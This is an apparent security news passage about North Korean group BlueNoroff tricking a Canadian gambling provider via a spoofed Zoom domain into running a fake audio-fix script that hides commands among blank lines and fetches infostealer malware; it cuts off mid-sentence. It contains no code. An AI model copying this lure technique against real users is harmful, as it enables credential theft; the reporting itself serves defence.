BlueNoroff Hackers Exploit Zoom App to Deploy Infostealer Malware in Targeted Attacks

The Field Effect Analysis team has uncovered a targeted social engineering campaign orchestrated by the North Korean state-sponsored threat actor BlueNoroff, a financially motivated subgroup of the notorious Lazarus Group.

A Canadian online gambling provider fell victim to a meticulously crafted attack involving impersonation of a trusted contact and the Zoom platform.

Sophisticated Social Engineering Campaign

The attacker leveraged a spoofed domain, zoom-tech[.]us, to deceive the victim during a scheduled cryptocurrency-related Zoom meeting.

By exploiting audio issues as a pretext, the threat actor coerced the victim into running a malicious script disguised as a Zoom audio repair tool.

According to the Report, this script, laced with hidden commands among 10,000 blank lines, initiated a chain of events that downloaded infostealer malware, ultimately compromising sensitive data including user credentials and browser profiles.

The infection chain employed by BlueNoroff showcases a ...